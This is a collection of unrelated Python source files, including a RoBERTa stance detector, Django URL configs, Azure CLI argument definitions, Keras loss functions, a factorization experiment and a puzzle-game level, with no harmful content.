"description": "Output data schema for predictions.",
"laleType": "Any",
}
|
import unittest
from translator import *
class TestEnglishToFrechTranslator(unittest.TestCase):
def test_null_value(self):
self.assertEqual(english_to_french(None), "Please provide some text.")
def test_valid_arguement(self):
self.assertEqual(english_to_french("Hello"), "Bonjour")
class TestFrenchTpEnglishTranslation(unittest.TestCase):
def test_null_value(self):
self.assertEqual(french_to_english(None), "Please provide some text.")
def test_valid_arguement(self):
self.assertEqual(french_to_english("Bonjour"), "Hello")
if __name__ == '__main__':
unittest.main()
|
import re
def collapse_whitespace(text):
""" Collapse all consecutive whitespace, newlines and tabs
in a string into single whitespaces, and strip the outer
whitespace. This will also accept an ``lxml`` element and
extract all text. """
if text is None:
return None
if hasattr(text, 'xpath'):
text = text.xpath('string()')
text = re.sub('\s+', ' ', text)
return text.strip()
|
"""
Contains functions that load and manipulate settings
"""
import json
from configuration.server_settings import ServerSettings
from configuration.database_settings import DatabaseSettings
from configuration.backend_settings import BackendSettings
from configuration.youtube_settings import YoutubeSettings
class ApplicationSettings():
"""
Contains static settings for the application
"""
def __init__(self, settings_file='./settings.json'):
self.settings_file_name = settings_file
self.server = None
self.database = None
self.youtube = None
self.backend = None
def load(self):
"""
A method that loads all the application settings from the settings file
"""
try:
with open(self.settings_file_name, 'r') as settings_file:
content = settings_file.read()
settings_dict = json.loads(content)
self.server = ServerSettings(settings_dict['server'])
self.database = DatabaseSettings(settings_dict['database'])
self.youtube = YoutubeSettings(settings_dict['youtube'])
self.backend = BackendSettings(settings_dict['backend'])
except OSError as err:
print('OS error: {0}'.format(err))
APP_SETTINGS_INSTANCE = ApplicationSettings()
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.MaterialsDashboardView.as_view(), name='material-dashboard'),
path('list/', views.MaterialListView.as_view(), name='material-list'),
path('create/', views.MaterialCreateView.as_view(), name='material-create'),
path('create/modal/', views.MaterialModalCreateView.as_view(), name='material-create-modal'),
path('<int:pk>/', views.MaterialDetailView.as_view(), name='material-detail'),
path('<int:pk>/modal/', views.MaterialModalDetailView.as_view(), name='material-detail-modal'),
path('<int:pk>/update/', views.MaterialUpdateView.as_view(), name='material-update'),
path('<int:pk>/update/modal/', views.MaterialModalUpdateView.as_view(), name='material-update-modal'),
path('<int:pk>/delete/', views.MaterialModalDeleteView.as_view(), name='material-delete-modal'),
path('sample_series/', views.SampleSeriesListView.as_view(), name='sampleseries-list'),
path('sample_series/featured', views.FeaturedMaterialListView.as_view(), name='sampleseries-list-featured'),
path('sample_series/create/', views.SampleSeriesCreateView.as_view(), name='sampleseries-create'),
path('sample_series/create/modal', views.SampleSeriesModalCreateView.as_view(), name='sampleseries-create-modal'),
path('sample_series/<int:pk>/', views.SampleSeriesDetailView.as_view(), name='sampleseries-detail'),
path('sample_series/<int:pk>/modal/', views.SampleSeriesModalDetailView.as_view(), name='sampleseries-detail-modal'),
path('sample_series/<int:pk>/update/', views.SampleSeriesUpdateView.as_view(), name='sampleseries-update'),
path('sample_series/<int:pk>/update/modal/', views.SampleSeriesModalUpdateView.as_view(), name='sampleseries-update-modal'),
path('sample_series/<int:pk>/delete/modal/', views.SampleSeriesModalDeleteView.as_view(), name='sampleseries-delete-modal'),
path('sample_series/<int:pk>/add_composition/', views.AddCompositionView.as_view(), name='sampleseries-add-composition'),
path('sample_series/<int:pk>/duplicate/', views.SampleSeriesCreateDuplicateView.as_view(), name='sampleseries-duplicate'),
path('sample_series/<int:pk>/duplicate/modal/', views.SampleSeriesModalCreateDuplicateView.as_view(), name='sampleseries-duplicate-modal'),
path('samples/', views.SampleListView.as_view(), name='sample-list'),
path('samples/featured', views.FeaturedSampleListView.as_view(), name='sample-list-featured'),
path('samples/create/', views.SampleCreateView.as_view(), name='sample-create'),
path('samples/create/modal', views.SampleModalCreateView.as_view(), name='sample-create-modal'),
path('samples/<int:pk>/', views.SampleDetailView.as_view(), name='sample-detail'),
path('samples/<int:pk>/modal/', views.SampleModalDetailView.as_view(), name='sample-detail-modal'),
path('samples/<int:pk>/update/', views.SampleUpdateView.as_view(), name='sample-update'),
path('samples/<int:pk>/update/modal/', views.SampleModalUpdateView.as_view(), name='sample-update-modal'),
path('samples/<int:pk>/delete/modal/', views.SampleModalDeleteView.as_view(), name='sample-delete-modal'),
path('samples/<int:pk>/add_property', views.SampleAddPropertyView.as_view(), name='sample-add-property'),
path('samples/<int:pk>/add_property/modal', views.SampleModalAddPropertyView.as_view(), name='sample-add-property-modal'),
path('samples/<int:pk>/duplicate/', views.SampleCreateDuplicateView.as_view(), name='sample-duplicate'),
path('samples/<int:pk>/duplicate/modal/', views.SampleModalCreateDuplicateView.as_view(), name='sample-duplicate-modal'),
path('categories/', views.MaterialCategoryListView.as_view(), name='materialcategory-list'),
path('categories/create/', views.MaterialCategoryCreateView.as_view(), name='materialcategory-create'),
path('categories/create/modal/', views.MaterialCategoryCreateView.as_view(), name='materialcategory-create-modal'),
path('categories/<int:pk>/', views.MaterialCategoryDetailView.as_view(), name='materialcategory-detail'),
path('categories/<int:pk>/modal/', views.MaterialCategoryModalDetailView.as_view(), name='materialcategory-detail-modal'),
path('categories/<int:pk>/update/', views.MaterialCategoryUpdateView.as_view(), name='materialcategory-update'),
path('categories/<int:pk>/update/modal/', views.MaterialCategoryModalUpdateView.as_view(), name='materialcategory-update-modal'),
path('categories/<int:pk>/delete/modal/', views.MaterialCategoryModalDeleteView.as_view(), name='materialcategory-delete-modal'),
path('components/', views.ComponentListView.as_view(), name='materialcomponent-list'),
path('components/create/', views.ComponentCreateView.as_view(), name='materialcomponent-create'),
path('components/create/modal', views.ComponentModalCreateView.as_view(), name='materialcomponent-create-modal'),
path('components/<int:pk>/', views.ComponentDetailView.as_view(), name='materialcomponent-detail'),
path('components/<int:pk>/modal/', views.ComponentModalDetailView.as_view(), name='materialcomponent-detail-modal'),
path('components/<int:pk>/update/', views.ComponentUpdateView.as_view(), name='materialcomponent-update'),
path('components/<int:pk>/update/modal/', views.ComponentUpdateView.as_view(), name='materialcomponent-update-modal'),
path('components/<int:pk>/delete/modal/', views.ComponentModalDeleteView.as_view(), name='materialcomponent-delete-modal'),
path('componentgroups/', views.ComponentGroupListView.as_view(), name='materialcomponentgroup-list'),
path('componentgroups/create/', views.ComponentGroupCreateView.as_view(), name='materialcomponentgroup-create'),
path('componentgroups/create/modal/', views.ComponentGroupModalCreateView.as_view(), name='materialcomponentgroup-create-modal'),
path('componentgroups/<int:pk>/', views.ComponentGroupDetailView.as_view(), name='materialcomponentgroup-detail'),
path('componentgroups/<int:pk>/modal/', views.ComponentGroupModalDetailView.as_view(), name='materialcomponentgroup-detail-modal'),
path('componentgroups/<int:pk>/update/', views.ComponentGroupUpdateView.as_view(), name='materialcomponentgroup-update'),
path('componentgroups/<int:pk>/update/modal/', views.ComponentGroupModalUpdateView.as_view(), name='materialcomponentgroup-update-modal'),
path('componentgroups/<int:pk>/delete/modal/', views.ComponentGroupModalDeleteView.as_view(), name='materialcomponentgroup-delete-modal'),
path('properties/', views.MaterialPropertyListView.as_view(), name='materialproperty-list'),
path('properties/create/', views.MaterialPropertyCreateView.as_view(), name='materialproperty-create'),
path('properties/create/modal/', views.MaterialPropertyModalCreateView.as_view(), name='materialproperty-create-modal'),
path('properties/<int:pk>/', views.MaterialPropertyDetailView.as_view(), name='materialproperty-detail'),
path('properties/<int:pk>/modal/', views.MaterialPropertyModalDetailView.as_view(), name='materialproperty-detail-modal'),
path('properties/<int:pk>/update/', views.MaterialPropertyUpdateView.as_view(), name='materialproperty-update'),
path('properties/<int:pk>/update/modal/', views.MaterialPropertyModalUpdateView.as_view(), name='materialproperty-update-modal'),
path('properties/<int:pk>/delete/modal/', views.MaterialPropertyModalDeleteView.as_view(), name='materialproperty-delete-modal'),
path('property_values/<int:pk>/delete/modal/', views.MaterialPropertyValueModalDeleteView.as_view(), name='materialpropertyvalue-delete-modal'),
path('compositions/', views.CompositionListView.as_view(), name='composition-list'),
path('compositions/create/', views.CompositionCreateView.as_view(), name='composition-create'),
path('compositions/create/modal/', views.CompositionCreateView.as_view(), name='composition-create-modal'),
path('compositions/<int:pk>/', views.CompositionDetailView.as_view(), name='composition-detail'),
path('compositions/<int:pk>/modal/', views.CompositionModalDetailView.as_view(), name='composition-detail-modal'),
path('compositions/<int:pk>/update/', views.CompositionUpdateView.as_view(), name='composition-update'),
path('compositions/<int:pk>/update/modal', views.CompositionModalUpdateView.as_view(), name='composition-update-modal'),
path('compositions/<int:pk>/delete/', views.CompositionModalDeleteView.as_view(), name='composition-delete-modal'),
path('compositions/<int:pk>/add_component/', views.AddComponentView.as_view(), name='composition-add-component'),
path('compositions/<int:pk>/order_up/', views.CompositionOrderUpView.as_view(), name='composition-order-up'),
path('compositions/<int:pk>/order_down/', views.CompositionOrderDownView.as_view(), name='composition-order-down'),
path('materialcomponentgroups/settings/<int:pk>/add_source/', views.AddSourceView.as_view(), name='add_source'),
path('materialcomponentgroups/settings/<int:pk>/add_seasonal_variation/', views.AddSeasonalVariationView.as_view(), name='add_seasonal_variation'),
path('materialcomponentgroups/settings/<int:pk>/remove_seasonal_variation/<int:distribution_pk>/', views.RemoveSeasonalVariationView.as_view(), name='remove_seasonal_variation'),
path('weightshares/<int:pk>/delete/', views.WeightShareModalDeleteView.as_view(), name='weightshare-delete-modal'),
]
|
from . spatial_indexes import *
|
#
# Copyright (c) 2020 Expert System Iberia
#
"""Stance detector
"""
import os
import logging
from transformers import RobertaForSequenceClassification
from transformers import RobertaTokenizer
import torch
import json
import numpy as np
from esiutils import bot_describer, dictu, hashu
logger = logging.getLogger(__name__)
sentStanceReviewer_schema = {
'super_types': ['SoftwareApplication', 'Bot'],
'ident_keys': ['@type', 'name', 'dateCreated', 'softwareVersion',
'isBasedOn', 'launchConfiguration'],
'itemref_keys': ['isBasedOn']
}
def load_saved_fnc1_model(in_dir):
model = RobertaForSequenceClassification.from_pretrained(in_dir)
if torch.cuda.is_available():
model = model.cuda()
tokenizer = RobertaTokenizer.from_pretrained(in_dir)
model_meta = {}
with open(os.path.join(in_dir, 'fnc1-classifier.json')) as in_f:
model_meta = json.load(in_f)
return {
'tokenizer': tokenizer,
'model': model,
'model_meta': model_meta,
'model_info': stance_reviewer(model_meta, in_dir)
}
def stance_reviewer(model_meta, in_dir):
result = {
'@context': 'http://coinform.eu',
'@type': 'SentStanceReviewer',
'additionalType': sentStanceReviewer_schema['super_types'],
'name': 'ESI Sentence Stance Reviewer',
'description': 'Assesses the stance between two sentences (e.g. agree, disagree, discuss) it was trained and evaluated on FNC-1 achieving 92% accuracy.',
'author': bot_describer.esiLab_organization(),
'dateCreated': '2020-01-13T15:18:00Z',
'applicationCategory': ['NLP'],
'applicationSubCategory': ['Stance Detection'],
'applicationSuite': ['Co-inform'],
'softwareRequirements': ['python', 'pytorch', 'transformers', 'RoBERTaModel', 'RoBERTaTokenizer'],
'softwareVersion': '0.1.1',
'executionEnvironment': {
**bot_describer.inspect_execution_env(),
'cuda': torch.cuda.is_available()},
'isBasedOn': [],
'launchConfiguration': {
'model': model_meta,
'model_config': bot_describer.path_as_media_object(
os.path.join(in_dir, 'config.json')),
'pytorch_model': bot_describer.path_as_media_object(
os.path.join(in_dir, 'pytorch_model.bin'))
}
}
result['identifier'] = calc_stance_reviewer_id(result)
return result
def calc_stance_reviewer_id(stance_reviewer):
"""Calculates a unique id code for a stance reviewer
:param stance_reviewer: a `SentStanceReviewer` dict
:returns: a hashcode that tries to capture the identity of the stance reviewer
:rtype: str
"""
return hashu.hash_dict(dictu.select_keys(
stance_reviewer, sentStanceReviewer_schema['ident_keys']
))
def softmax(X, theta=1.0, axis=None):
"""
Compute the softmax of each element along an axis of X.
From https://nolanbconaway.github.io/blog/2017/softmax-numpy.html
Parameters
----------
X: ND-Array. Probably should be floats.
theta (optional): float parameter, used as a multiplier
prior to exponentiation. Default = 1.0
axis (optional): axis to compute values along. Default is the
first non-singleton axis.
Returns an array the same size as X. The result will sum to 1
along the specified axis.
"""
y = np.atleast_2d(X) # make X at least 2d
if axis is None: # find axis
axis = next(j[0] for j in enumerate(y.shape) if j[1] > 1)
y = y * float(theta) # multiply y against the theta parameter,
# subtract the max for numerical stability
y = y - np.expand_dims(np.max(y, axis=axis), axis)
y = np.exp(y)
# take the sum along the specified axis
ax_sum = np.expand_dims(np.sum(y, axis=axis), axis)
p = y / ax_sum # finally: divide elementwise
if len(X.shape) == 1: # flatten if X was 1D
p = p.flatten()
return p
def pad_encode(headline, body, tokenizer, max_length=50):
"""creates token ids of a uniform sequence length for a given sentence"""
tok_ids_0 = tokenizer.convert_tokens_to_ids(tokenizer.tokenize(headline))
tok_ids_1 = tokenizer.convert_tokens_to_ids(tokenizer.tokenize(body))
tok_ids2 = tokenizer.build_inputs_with_special_tokens(tok_ids_0, tok_ids_1)
tok_types = tokenizer.create_token_type_ids_from_sequences(
tok_ids_0, tok_ids_1)
att_mask = [1 for _ in tok_ids2]
assert len(tok_ids2) == len(tok_types), "%d != %d" (
len(tok_ids2), len(tok_types))
# n_spectoks = len(tok_ids2) - (len(tok_ids_0) + len(tok_ids_1))
# print('encoding pair as', len(tok_ids_0), len(tok_ids_1), n_spectoks)
if len(tok_ids2) > max_length: # need to truncate
#print('Truncating from', len(tok_ids2))
n_to_trunc = len(tok_ids2) - max_length
tot0_1 = len(tok_ids_0) + len(tok_ids_1)
assert tot0_1 > 0
n_to_trunc0 = int(n_to_trunc * (len(tok_ids_0) / tot0_1))
n_to_trunc1 = n_to_trunc - n_to_trunc0
ttids0 = tok_ids_0[:-n_to_trunc0] if n_to_trunc0 > 0 else tok_ids_0
ttids1 = tok_ids_1[:-n_to_trunc1] if n_to_trunc1 > 0 else tok_ids_1
tok_ids2 = tokenizer.build_inputs_with_special_tokens(ttids0, ttids1)
tok_types = tokenizer.create_token_type_ids_from_sequences(
ttids0, ttids1)
att_mask = [1 for _ in tok_ids2]
elif len(tok_ids2) < max_length: # need to pad
padding = []
for i in range(len(tok_ids2), max_length):
padding.append(tokenizer.pad_token_id)
att_mask += [0 for _ in padding]
tok_types += [0 for _ in padding]
tok_ids2 = tok_ids2 + padding
assert len(tok_ids2) == max_length, '%s != %s \n%s\n%s' % (
len(tok_ids2), max_length, headline, body)
assert len(att_mask) == max_length
assert len(tok_types) == max_length
return tok_ids2, att_mask, tok_types
def tokenize_batch(inputs, tok_model, max_len=50, debug=False):
assert type(inputs) == list
encoded = [pad_encode(headline, body, tokenizer=tok_model['tokenizer'],
max_length=max_len) for (headline, body) in inputs]
input_ids = torch.tensor([e[0] for e in encoded])
att_masks = torch.tensor([e[1] for e in encoded])
type_ids = torch.tensor([e[2] for e in encoded])
if debug:
print('Input_ids shape: %s' % (input_ids.shape))
if torch.cuda.is_available():
input_ids = input_ids.cuda()
att_masks = att_masks.cuda()
type_ids = type_ids.cuda()
return input_ids, att_masks, type_ids
def pred_label(inputs, tok_model, strategy="pooled", seq_len=50,
use_tok_type=True, # for RoBERTa, we need to train them first!
debug=False):
"""Returns the embeddings for the input sentences, based on the `tok_model`
:param tok_model dict with keys `tokenizer` and `model`
:param strategy see `embedding_from_bert_output`
"""
input_ids, att_masks, type_ids = tokenize_batch(
inputs, tok_model, debug=debug, max_len=seq_len)
model = tok_model['model']
model.eval() # needed to deactivate any Dropout layers
# if debug:
logger.info('Stancepred with input_ids %s mask %s, tok_types %s' % (
input_ids.shape, att_masks.shape, type_ids.shape))
with torch.no_grad():
model_out = model(input_ids, attention_mask=att_masks,
token_type_ids=type_ids if use_tok_type else None)
assert len(model_out) == 1
return model_out[0]
def predict_stances(tokmodmeta, claim_bod_pairs):
inputs = claim_bod_pairs
meta = tokmodmeta['model_meta']
stance2i = meta['stance2i']
preds = pred_label(inputs, tokmodmeta,
seq_len=int(meta.get('seq_len')),
use_tok_type=False)
soft_preds = softmax(preds, theta=1, axis=1)
labids = soft_preds.argmax(axis=1)
max_vals = np.take_along_axis(
soft_preds,
np.expand_dims(labids, axis=1),
axis=1)
i2stance = {i: stance for stance, i in stance2i.items()}
labels = [i2stance[sid] for sid in labids]
confs = [float(mv[0]) for mv in max_vals]
assert len(labels) == len(confs), '%d != %d' % (
len(labels), len(confs))
return labels, confs
def predict_stance(tokmodmeta, claim, doc_bodies):
"""Predict stance labels for a `claim` and one or more `doc_bodies`
:param tokmodmeta: a pre-trained dict with fields
`model` the pre-trained model
`tokenizer` the tokenizer to use for encoding string inputs
`model_meta` metadata useful for configuring and identifying the
model
:param claim: str the claim for which to predict stance of documents
:param doc_bodies: list of strings. The bodies of articles for which
you want to assess stance relative to the input `claim`
:returns: a tuple of two aligned lists. The first list contains the
stance labels (one of `agree`, `disagree`, `discuss`, `unrelated`)
the second list contains confidence values for the prediction.
:rtype: tuple
"""
inputs = [(claim, docbod) for docbod in doc_bodies]
return predict_stances(tokmodmeta, inputs)
|
# You can import these by
# from composite_factorization import *
# Example Uses:
# In [148]: try_factorization_mod_one((1009*101)**8)
# Out[148]: [101]
# In [151]: find_prime_factor(1009732533765211)
# 239 11344301
# The 239 here is the powers number to find the prime so we can use this next example to find it
# rather quickly:
# In [152]: try_factorization_mod_one((1009732533765211)**239)
# Out[152]: [11344301]
# Another Example:
# In [323]: try_factorization_mod_one((1009*1013)**2)
# or
# In [325]: try_factorization_mod_one(1022117**2)
# Out[325]: [1009]
# In [156]: find_prime_factor(1022117)
# 2 1009
# In [720]: pow((1009*29)**4,1)
# Out[720]: 733088921637866641
# In [721]: try_factorization_mod(733088921637866641)
# Out[721]: [29, 17836, 18, 376, 12, 30, 2, 32, 128, 2, 2, 16]
# In [726]: (1009*1013)**2
# Out[726]: 1044723161689
# In [727]: try_factorization_mod(1044723161689)
# Out[727]: [1009, 24, 42, 2, 8, 2, 22, 54, 2, 4, 2]
# No factorization is used, this is a pure mod method to extract primes from a number
# Most factorization techiniques break down numbers into their prime components. I created a method
# that breaks down a number into it's composite factors which can be rebuilt with
# build_composite_number:
# In [154]: try_factorization_mod((1009732533765211))
# Out[154]: [1, 1710, 150, 6, 256, 36, 630, 16, 2, 2]
# In [155]: build_composite_number([1, 1710, 150, 6, 256, 36, 630, 16, 2, 2])
# Out[155]: 1009732533765211
# Interstingly, i use no factorization at all to find the prime numbers, just mod operations, which
# is different from other techniques.
def try_factorization_mod(hm):
vv = []
num = hm
cr = pow(num,1,1<<(num).bit_length()-1)
while num > 1 and cr != 0:
while cr != 0:
prevcr = cr
cr = num%cr
vv.append(prevcr)
num = (num // prevcr) -1
cr = num%(1<<(num).bit_length()-1)
vv.append(num)
return vv
def try_factorization_mod_one(hm):
vv = []
num = hm
cr = pow(num,1,1<<(num).bit_length()-1)
while cr != 0:
prevcr = cr
cr = num%cr
vv.append(prevcr)
num = (num // prevcr) -1
cr = num%(1<<(num).bit_length()-1)
return vv
def find_prime_factor(hm):
for x in range(1, 1000):
c = try_factorization_mod_one((hm)**x)
if c[0] != 1:
if hm % c[0] == 0 :
print(x,c[0])
break
def build_composite_number(hm):
si = hm[-1]
for x in range(len(hm)-2, -1, -1):
si = si * hm[x] + hm[x]
return si
|
########################################
# INSTRUCTIONS
# Replace the xxxx with the name of your sql server and the name of the Database
# If your SQLITE dummy db is in another directory from the script, you can update that as well.
#
# NOTE: retain the quotation marks around the server and db name.
# NOTE: DO NOT alter the variable names, ie the text 'MSSQL_server_name' and
# 'datamart_name'. If you change them the program will not run.
#
# Example of what it should look like:
# MSSQL_server_name = 'my-server'
# datamart_name = 'my-datamart'
#################################################
# replace the content between the '' ONLY
MSSQL_server_name = 'xxxx'
datamart_name = 'xxxx'
# only change this if your dummy database is in another directory
sqlite_location = 'member_net\\demo_data.db'
|
from django.conf.urls import include, url
from django.contrib import admin
from django.contrib.auth import views as base_auth_views
from django.conf import settings
from django.conf.urls.static import static
from django.urls import reverse_lazy
from django.views.generic import RedirectView
urlpatterns = [
# Admin redirections/views
url(r'^admin/login/$', RedirectView.as_view(url=reverse_lazy(settings.LOGIN_URL),
query_string=True)),
url(r'^staff/login/$', RedirectView.as_view(url=reverse_lazy(settings.LOGIN_URL),
query_string=True)),
url(r'^admin/$', RedirectView.as_view(url=reverse_lazy('admin:app_list',
args=('huntserver',)))),
url(r'^staff/$', RedirectView.as_view(url=reverse_lazy('admin:app_list',
args=('huntserver',)))),
url(r'^staff/', admin.site.urls),
url(r'^admin/', admin.site.urls),
# All of the huntserver URLs
url(r'^', include('huntserver.urls', namespace="huntserver")),
# User auth/password reset
url(r'^accounts/logout/$', base_auth_views.LogoutView.as_view(),
name='logout', kwargs={'next_page': '/'}),
url(r'^accounts/login/$', base_auth_views.LoginView.as_view()),
url(r'^password_reset/$', base_auth_views.PasswordResetView.as_view(), name='password_reset'),
url(r'^password_reset/done/$', base_auth_views.PasswordResetDoneView.as_view(),
name='password_reset_done'),
url(r'^reset/(?P<uidb64>[0-9A-Za-z_\-]+)/(?P<token>[0-9A-Za-z]{1,13}-[0-9A-Za-z]{1,20})/$',
base_auth_views.PasswordResetConfirmView.as_view(), name='password_reset_confirm'),
url(r'^reset/done/$', base_auth_views.PasswordResetCompleteView.as_view(),
name='password_reset_complete'),
]
# Use silk if enabled
if 'silk' in settings.INSTALLED_APPS:
urlpatterns.append(url(r'^silk/', include('silk.urls', namespace='silk')))
# Hack for using development server
if(settings.DEBUG):
import debug_toolbar
urlpatterns = urlpatterns + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
urlpatterns.append(url(r'^__debug__/', include(debug_toolbar.urls)))
|
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
# pylint: disable=too-many-statements
from azure.cli.core.commands.parameters import (
tags_type,
get_three_state_flag,
get_enum_type,
resource_group_name_type,
get_location_type
)
from azure.cli.core.commands.validators import get_default_location_from_resource_group
from azext_automation.action import (
AddPropertiesParameters
)
from azext_automation.vendored_sdks.automation.models import SkuNameEnum, RunbookTypeEnum
def load_arguments(self, _):
with self.argument_context('automation account list') as c:
c.argument('resource_group_name', resource_group_name_type)
with self.argument_context('automation account show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('automation_account_name', options_list=['--name', '-n', '--automation-account-name'], type=str,
help='The name of the automation account.', id_part='name')
with self.argument_context('automation account delete') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('automation_account_name', options_list=['--name', '-n', '--automation-account-name'], type=str,
help='The name of the automation account.', id_part='name')
with self.argument_context('automation account create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('automation_account_name', options_list=['--name', '-n', '--automation-account-name'],
help='The name of the automation account.')
c.argument('location', arg_type=get_location_type(self.cli_ctx),
validator=get_default_location_from_resource_group)
c.argument('tags', tags_type)
c.argument('sku', help='Account SKU.', arg_type=get_enum_type(SkuNameEnum))
with self.argument_context('automation account update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('automation_account_name', options_list=['--name', '-n', '--automation-account-name'],
help='The name of the automation account.', id_part='name')
c.argument('tags', tags_type)
c.argument('sku', help='Account SKU.', arg_type=get_enum_type(SkuNameEnum))
with self.argument_context('automation runbook create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('automation_account_name', type=str, help='The name of the automation account.')
c.argument('name', options_list=['--name', '-n', '--runbook-name'], type=str, help='The runbook name.')
c.argument('location', arg_type=get_location_type(self.cli_ctx),
validator=get_default_location_from_resource_group)
c.argument('tags', tags_type)
c.argument('runbook_type', options_list=['--type'], help='Type of the runbook.',
arg_type=get_enum_type(RunbookTypeEnum))
c.argument('description', type=str, help='Description of the runbook.')
c.argument('log_verbose', arg_type=get_three_state_flag(), help='Verbose log option of the runbook.')
c.argument('log_progress', arg_type=get_three_state_flag(), help='Progress log option of the runbook.')
c.argument('log_activity_trace', type=int, help='Activity level tracing options of the runbook.')
with self.argument_context('automation runbook update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('automation_account_name', type=str, help='The name of the automation account.', id_part='name')
c.argument('name', options_list=['--name', '-n', '--runbook-name'], type=str, help='The runbook name.',
id_part='child_name_1')
c.argument('tags', tags_type)
c.argument('description', type=str, help='Description of the runbook.')
c.argument('log_verbose', arg_type=get_three_state_flag(), help='Verbose log option of the runbook.')
c.argument('log_progress', arg_type=get_three_state_flag(), help='Progress log option of the runbook.')
c.argument('log_activity_trace', type=int, help='Activity level tracing options of the runbook.')
with self.argument_context('automation runbook replace-content') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('automation_account_name', type=str, help='The name of the automation account.', id_part='name')
c.argument('name', options_list=['--name', '-n', '--runbook-name'], help='The runbook name.',
id_part='child_name_1')
c.argument('content', help='The runbook content.')
with self.argument_context('automation runbook revert-to-published') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('automation_account_name', type=str, help='The name of the automation account.', id_part='name')
c.argument('name', options_list=['--name', '-n', '--runbook-name'], help='The runbook name.',
id_part='child_name_1')
with self.argument_context('automation runbook start') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('automation_account_name', type=str, help='The name of the automation account.', id_part='name')
c.argument('name', options_list=['--name', '-n', '--runbook-name'], type=str, help='The runbook name.',
id_part='child_name_1')
c.argument('properties_parameters', options_list=['--parameters'], action=AddPropertiesParameters, nargs='*',
help='Parameters of the job. Expect value: KEY1=VALUE1 KEY2=VALUE2 ...')
c.argument('run_on', type=str, help='RunOn which specifies the group name where the job is to be executed.')
with self.argument_context('automation job list') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('automation_account_name', type=str, help='The name of the automation account.')
with self.argument_context('automation job show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('automation_account_name', type=str, help='The name of the automation account.', id_part='name')
c.argument('job_name', options_list=['--name', '-n', '--job-name'], type=str, help='The job name.',
id_part='child_name_1')
# with self.argument_context('automation job get-output') as c:
# c.argument('resource_group_name', resource_group_name_type)
# c.argument('automation_account_name', type=str, help='The name of the automation account.', id_part='name')
# c.argument('job_name', options_list=['--name', '-n', '--job-name'], type=str, help='The job name.',
# id_part='child_name_1')
with self.argument_context('automation job resume') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('automation_account_name', type=str, help='The name of the automation account.', id_part='name')
c.argument('job_name', options_list=['--name', '-n', '--job-name'], type=str, help='The job name.',
id_part='child_name_1')
with self.argument_context('automation job stop') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('automation_account_name', type=str, help='The name of the automation account.', id_part='name')
c.argument('job_name', options_list=['--name', '-n', '--job-name'], type=str, help='The job name.',
id_part='child_name_1')
with self.argument_context('automation job suspend') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('automation_account_name', type=str, help='The name of the automation account.', id_part='name')
c.argument('job_name', options_list=['--name', '-n', '--job-name'], type=str, help='The job name.',
id_part='child_name_1')
|
import numpy as np
import tensorflow as tf
from tensorflow.keras import backend as K
def l1_error(y_true, y_pred):
"""Calculate the L1 loss used in all loss calculations"""
if K.ndim(y_true) == 4:
return K.mean(K.abs(y_pred - y_true), axis=[1,2,3])
elif K.ndim(y_true) == 3:
return K.mean(K.abs(y_pred - y_true), axis=[1,2])
else:
raise NotImplementedError("Calculating L1 loss on 1D tensors? should not occur for this network")
def gram_matrix(x, norm_by_channels=False):
"""Calculate gram matrix used in style loss"""
# Assertions on input
assert K.ndim(x) == 4, 'Input tensor should be a 4d (B, H, W, C) tensor'
assert K.image_data_format() == 'channels_last', "Please use channels-last format"
# Permute channels and get resulting shape
x = K.permute_dimensions(x, (0, 3, 1, 2))
shape = K.shape(x)
B, C, H, W = shape[0], shape[1], shape[2], shape[3]
# Reshape x and do batch dot product
features = K.reshape(x, K.stack([B, C, H*W]))
gram = K.batch_dot(features, features, axes=2)
# Normalize with channels, height and width
gram = gram / K.cast(C * H * W, x.dtype)
return gram
def total_variation(y_comp):
"""Total variation loss, used for smoothing the hole region, see. eq. 6"""
a = l1_error(y_comp[:,1:,:,:], y_comp[:,:-1,:,:])
b = l1_error(y_comp[:,:,1:,:], y_comp[:,:,:-1,:])
return a + b
|
import numpy
n, m, p = map(int, raw_input().split())
entries_1 = []
entries_2 = []
for i in range(n):
entries_1.append(map(int, raw_input().split()))
matrix_1 = numpy.array(entries_1)
matrix_1 = numpy.reshape(matrix_1, (n,p))
for j in range(m):
entries_2.append(map(int, raw_input().split()))
matrix_2 = numpy.array(entries_2)
matrix_2 = numpy.reshape(matrix_2, (m,p))
print numpy.concatenate((matrix_1,matrix_2), axis = 0)
|
# .................................................................................................................
level_dict["church"] = {
"scheme": "yellow_scheme",
"size": (5,7,5),
"intro": "church",
"help": (
"$scale(1.5)mission:\nactivate the exit!\n\n" + \
"to activate the exit,\nfeed it with electricity:\n\n" + \
"connect the generator\nwith the motor\n\n" + \
"place a wire stone\nnext to the exit",
),
"player": { "position": (1,0,0),
},
"exits": [
{
"name": "exit",
"active": 0,
"position": (0,-1,0),
},
],
"create":
"""
s = world.getSize()
world.addObjectLine ("KikiWireStone()", KikiPos (0, 0, 0), KikiPos (0, s.y-2, 0))
world.addObjectLine ("KikiWireStone()", KikiPos (s.x-1, 0, 0), KikiPos (s.x-1, s.y-2, 0))
world.addObjectLine ("KikiWireStone()", KikiPos (s.x-1, 0, s.z-1), KikiPos (s.x-1, s.y-2, s.z-1))
world.addObjectLine ("KikiWireStone()", KikiPos (0, 0, s.z-1), KikiPos (0, s.y-2, s.z-1))
world.addObjectAtPos (KikiBomb(), KikiPos (s.x/2, s.y-2, s.z/2))
world.addObjectAtPos (KikiGenerator (KikiFace.PY), KikiPos (s.x/2, s.y/2, s.z/2))
world.addObjectAtPos (KikiWireStone(), KikiPos (1, s.y-2, 1))
